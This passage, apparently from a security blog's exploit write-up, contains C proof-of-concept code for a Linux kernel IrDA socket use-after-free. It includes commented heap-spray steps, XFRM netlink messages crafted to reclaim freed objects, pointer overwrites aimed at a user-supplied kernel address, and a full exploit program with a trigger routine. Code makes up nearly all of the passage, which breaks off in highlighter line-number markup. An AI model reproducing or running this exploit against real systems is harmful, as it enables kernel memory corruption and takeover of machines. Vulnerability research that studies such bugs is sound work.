id=\"crayon-5bad57622f37f374049301-47\"><span class=\"crayon-c\">* dequeue_general() again *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-48\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-50\"><span class=\"crayon-c\">\/\/getchar();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-51\"><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-52\"><span class=\"crayon-c\">\/* By the time you start the spray, the q_prev ptr in the sock 3 object is<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-53\"><span class=\"crayon-c\">* already overwritten. In some cases you get lucky and there&#8217;s no object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-54\"><span class=\"crayon-c\">* allocated where sock 3 object was, so you&#8217;re overwriting bytes 8 to 16 of<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-55\"><span class=\"crayon-c\">* some unallocated object. If this was q_next for example, then you&#8217;d be<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-56\"><span class=\"crayon-c\">* overwriting the freelist ptr and corrupting the slab.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-58\"><span class=\"crayon-c\">* Note that when you get &#8220;unlucky&#8221; and some object is already allocated at the<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-59\"><span class=\"crayon-c\">* sock 3 object address, you&#8217;re overwriting bytes 8 to 16 of that object with<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-60\"><span class=\"crayon-c\">* address of sock 1 obj.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-61\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-63\"><span class=\"crayon-c\">\/* If the target object is still not allocated at this point, the spray would<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-64\"><span class=\"crayon-c\">* reset q_prev value to the target address (e.g., 0xdeadbeef in the example).<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-65\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-66\"><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4096<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-67\"><span class=\"crayon-e\">pid_t <\/span><span class=\"crayon-v\">pid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-68\"><span class=\"crayon-e\">u_int64_t <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81f01500<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-69\"><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-70\"><span class=\"crayon-c\">\/\/addr = 0xdeadbeef;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-71\"><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-72\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-73\"><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-74\"><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-76\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Spray memory and take control of the old freed objectn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-77\"><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-78\"><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-79\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-80\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-82\"><span class=\"crayon-c\">\/* Now inserting sock 4 obj would trigger your first oops message on<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-83\"><span class=\"crayon-c\">* dereferencing q_prev (0xdeadbeef) on the enqueue_first() path<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-84\"><span class=\"crayon-c\">* (*queue)-&gt;q_prev-&gt;q_next = element<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-85\"><span class=\"crayon-c\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-86\"><span class=\"crayon-c\">* where queue head is pointing to the sprayed object.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-87\"><span class=\"crayon-c\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-88\"><span class=\"crayon-c\">* The rest is not relevant.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-89\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-90\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-91\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Freeing object again n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-92\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-93\"><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-94\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Fill the last object with payload n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-95\"><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-96\"><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-98\"><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0086 seconds] -->  <\/p>\n<p>Here is a crash PoC showing that we&#8217;ve overwritten net_sysctl_root.set_ownership&#8221; doesn&#8217;t make sense based on the produced oops message showing that there was an attempt to execute NX memory address. What this oops message shows is that you&#8217;ve overwritten some function ptr (mostly due to luck) with address of the new ias_object (when binding) and then tried to execute that pointer in the original path.<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f389003567142\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #define _GNU_SOURCE  #include &lt;stdarg.h&gt;  #include &lt;stdint.h&gt;  #include &lt;stdio.h&gt;  #include &lt;string.h&gt;  #include &lt;time.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;sys\/types.h&gt;  #include &lt;sys\/wait.h&gt;  #include &lt;sys\/stat.h&gt;  #include &lt;netinet\/in.h&gt;  #include &lt;arpa\/inet.h&gt;  #include &lt;linux\/netlink.h&gt;  #include &lt;linux\/xfrm.h&gt;  #include &lt;linux\/irda.h&gt;  #include &lt;fcntl.h&gt;  #include &lt;sched.h&gt;  #include &lt;unistd.h&gt;      #define NLA_LENGTH(len)\t\t\t\t\t          (NLA_ALIGN(sizeof(struct nlattr)) + (len))  #define NLMSG_TAIL(nmsg)\t\t\t\t\t\t          ((struct nlattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)-&gt;nlmsg_len)))  #define NLA_DATA(nla)\t\t\t\t\t          ((void*)(((char*)(nla)) + NLA_LENGTH(0)))    char *saddr = &#8220;1111111122222222&#8221;;  char *daddr = &#8220;3333333344444444&#8221;;    struct sockaddr_nl addr;  struct req_newae {  \tstruct nlmsghdr n;  \tstruct xfrm_aevent_id id;  \tchar buf[2048];  };    struct req_newsa {  \tstruct nlmsghdr n;  \tstruct xfrm_usersa_info xsinfo;  \tchar buf[2048];  };    void create_ns(void)  {  \tif(unshare(CLONE_NEWUSER | CLONE_NEWNET) != 0) {  \t\tperror(&#8220;unshare(CLONE_NEWUSER)&#8221;);  \t\texit(1);  \t}  }    int create_netlink_socket()  {  \tint fd,err;    \tfd = socket(AF_NETLINK,SOCK_RAW,NETLINK_XFRM);  \tif( fd &lt; 0) {  \t\tperror(&#8220;socket&#8221;);  \t\treturn -1;  \t}    \tmemset(&amp;addr,0,sizeof(struct sockaddr_nl));  \taddr.nl_family = AF_NETLINK;  \taddr.nl_pid = 0; \/* packet goes into the kernel *\/  \taddr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/  \treturn fd;  }  int send_msg(int fd,struct nlmsghdr *msg)  {  \tint err;  \terr = sendto(fd,(void *)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,  \t\t     sizeof(struct sockaddr_nl));  \tif (err &lt; 0) {  \t\tperror(&#8220;sendto&#8221;);  \t\treturn -1;  \t}  \treturn 0;    }    int add_attr(struct nlmsghdr *n,int maxlen,int type,const void *data,int attrlen)  {  \tstruct nlattr *nl;  \tint len = NLA_LENGTH(attrlen);    \tnl = NLMSG_TAIL(n);  \tnl-&gt;nla_type = type;  \tnl-&gt;nla_len = len;  \tmemcpy(NLA_DATA(nl),data,attrlen);  \tn-&gt;nlmsg_len =NLMSG_ALIGN(n-&gt;nlmsg_len) + NLA_ALIGN(len);  \treturn 0;  }    struct req_newsa *build_sa_frame(unsigned char *payload,u_int32_t size)  {  \tstruct req_newsa *r;  \tin_addr_t src,dst;  \tstruct xfrm_mark mark = {0x0,0x0};  \tstruct xfrm_algo *algo;  \tstruct xfrm_replay_state_esn *esn;  \tsize_t esn_size;    \tr = malloc(sizeof(struct req_newsa));  \tif (!r) {  \t\tperror(&#8220;malloc&#8221;);  \t\treturn NULL;  \t}    \tr-&gt;n.nlmsg_type = XFRM_MSG_NEWSA;  \tr-&gt;n.nlmsg_flags = NLM_F_REQUEST|NLM_F_CREATE|NLM_F_EXCL;  \tr-&gt;n.nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));  \tr-&gt;xsinfo.lft.soft_byte_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.hard_byte_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.soft_packet_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.hard_packet_limit = XFRM_INF;  \tr-&gt;xsinfo.mode = XFRM_MODE_TUNNEL;  \tr-&gt;xsinfo.flags = XFRM_STATE_ESN;    \tsrc = inet_addr(saddr);  \tdst = inet_addr(daddr);    \tr-&gt;xsinfo.family = AF_INET6;    \t\/\/r-&gt;xsinfo.saddr.a4 = src;  \t\/\/r-&gt;xsinfo.id.daddr.a4 = dst;  \tmemcpy((char*)r-&gt;xsinfo.saddr.a6,saddr,16);  \tmemcpy((char*)r-&gt;xsinfo.id.daddr.a6,daddr,16);  \tr-&gt;xsinfo.id.proto = IPPROTO_AH;  \tr-&gt;xsinfo.id.spi = 12345;  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_MARK,&amp;mark,sizeof(mark));    \talgo = malloc(sizeof(struct xfrm_algo)+32+1);  \tif(!algo) {  \t\tperror(&#8220;algo allocation&#8221;);  \t\treturn NULL;  \t}  \tmemset(algo-&gt;alg_name,0,sizeof(algo-&gt;alg_name));  \tstrcpy(algo-&gt;alg_name,&#8221;hmac(sha256)&#8221;);  \talgo-&gt;alg_key_len = 0xcc;  \tstrncpy(algo-&gt;alg_key,&#8221;12345678901234567890123456789012&#8243;,32);  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_ALG_AUTH,algo,sizeof(struct xfrm_algo)+33);  \t  \t\/* build ens *\/  \tesn_size = sizeof(struct xfrm_replay_state_esn) + 1024;  \t  \tesn = (struct xfrm_replay_state_esn *)payload;  \t\/* This is mandatory, in order to let the kernel parse the nlattr structure  \t * if we want to use a specific memory location, we must allocate a memory  \t * with size=target address , which is a 32-bit value  \t *\/  \tesn-&gt;bmp_len = (size &#8211; sizeof(struct xfrm_replay_state_esn))\/4;  \t  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_REPLAY_ESN_VAL,esn,esn_size);    \treturn r;      }    void trigger() {  \topen(&#8220;\/proc\/sys\/net\/core\/somaxconn&#8221;,O_RDONLY);    \tprintf(&#8220;See crash ? n&#8221;);  }    void spray_heap(u_int8_t *payload,u_int32_t size,int iter)  {  \tint fd,err;  \tstruct req_newae *r;  \tstruct req_newsa *sa;  \tint i,j;  \t  #define SOCKFD 1000  \tint fds[SOCKFD];  \t\/* don&#8217;t make iter &gt;= 1000, or change SOCKFD   \t   to a greated value *\/  \tsa = build_sa_frame(payload,size);\t\t  \tfor(i=0;i&lt;iter;i++) {  \t\tfd = create_netlink_socket();  \t\t  \t\t\/\/printf(&#8220;send %dn&#8221;,i);  \t\tsend_msg(fd,&amp;sa-&gt;n);  \t\tfds[i] = fd;  \t\t\/* don&#8217;t close fds *\/  \t\t\/\/free(sa); \/* don&#8217;t need to do this*\/  \t\tusleep(1000);  \t}  \t\/\/free(sa);  \t  }  int irda_set_ias(int fd,char *name)  {  \tstruct irda_ias_set set;  \tint err = 0;  \tmemset(&amp;set,0,sizeof(set));      \tstrncpy(set.irda_class_name,name,64);  \tmemset(&amp;set.irda_attrib_name,&#8217;C&#8217;,255);  \tset.irda_attrib_type = 2;  \tset.attribute.irda_attrib_octet_seq.len = 8;    \tmemset(&amp;set.attribute.irda_attrib_octet_seq.octet_seq,0x41,1023);    \tset.daddr = 4;    \terr = setsockopt(fd,0x10a,0x2,&amp;set,sizeof(set));    \t\/\/printf(&#8220;setsockopt(SET) fd=%d  err=%dn&#8221;,fd,err);  \treturn err;  }    int irda_bind(int fd,u_int16_t  family,u_int8_t lsap_sel,int sir_addr,char *name)  {  \tstruct sockaddr_irda sa,sa1;  \tint err;  \t  \tmemset(&amp;sa,0,sizeof(sa));  \tsa.sir_family =family;  \tsa.sir_lsap_sel = lsap_sel;  \tsa.sir_addr = sir_addr;  \t  \tmemcpy(&amp;sa.sir_name,name,25);  \terr = bind(fd,(struct sockaddr*)&amp;sa,sizeof(sa));  \t\/\/printf(&#8220;bind fd=%d err=%dn&#8221;,fd,err);  \t  \treturn err;  }    void uaf(unsigned long target_addr)  {  \tint fd1,fd2,fd3,fd4;  \tstruct sockaddr_irda sa,sa1;  \tstruct irda_ias_set set;  \tint err = 0;  \tpthread_t tid[1024];  \t  \tmemset(&amp;set,0,sizeof(set));  \t  \tfd1 = socket(0x17,0x5,0);    \tfd2 = socket(0x17,0x5,0);    \tfd3 = socket(0x17,0x5,0);    \tfd4 = socket(0x17,0x5,0);    \t\/* create namespace for xfrm   \t * this is not required to trigger the bug  \t *\/  \tcreate_ns();  \t  \tirda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);  \t  \tint i;  \t  \tirda_bind(fd2,4,0x4b,0x3,&#8221;c&#8221;);  \tirda_bind(fd3,4,0x4c,0x3,&#8221;c&#8221;);  \tirda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);    \t  \tfor(i=0;i&lt;5;i++) {  \t\t\/* 0x00 means that it takes self-&gt;ias_obj *\/  \t\tirda_set_ias(fd2,&#8221;x00&#8243;);  \t\tirda_set_ias(fd3,&#8221;x00&#8243;);    \t}  \t  \t  \tclose(fd1);  \tclose(fd3);    \t\/* annoying the queue and free the first queued object*\/  \tprintf(&#8220;[+] Freeing the first queued ias object n&#8221;);    \tclose(fd2);  \t  \t\/\/getchar();  \tsleep(1);  \tunsigned char *buf = malloc(4096);  \tpid_t pid;  \tu_int64_t addr = 0xffffffff81f01500;  \taddr = 0xffffffff81efeb60;  \t\/\/addr = 0xdeadbeef;  \taddr = target_addr;  \tvoid *x = &amp;addr;  \tmemset(buf,0xcc,88);  \t*(void **)(buf+8) = (void*)addr;    \tprintf(&#8220;[+] Spray memory and take control of the old freed objectn&#8221;);  \tspray_heap(buf,88,200);  \tusleep(10000);  \t  \tprintf(&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;);  \tirda_bind(fd4,4,0&#215;30,0x3,&#8221;c&#8221;);  \tprintf(&#8220;[+] Freeing object again n&#8221;);  \tclose(fd4);  \tsleep(1);  \tprintf(&#8220;[+] Fill the last object with payload n&#8221;);  \tmemset(buf,0xcc,88);  \tspray_heap(buf,88,200);    \tusleep(1000);  \t  }      int main(int argc,char **argv)  {  \tunsigned long target_addr;  \tpid_t pid;  \t  \tif(argc != 2) {  \t\tprintf(&#8220;%s &lt;target object&gt;n&#8221;,*argv);  \t\treturn -1;  \t}  \tsscanf(argv[1],&#8221;%lx&#8221;,&amp;target_addr);    \tuaf(target_addr);    \ttrigger();  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-40\">40<\/div>\n<div 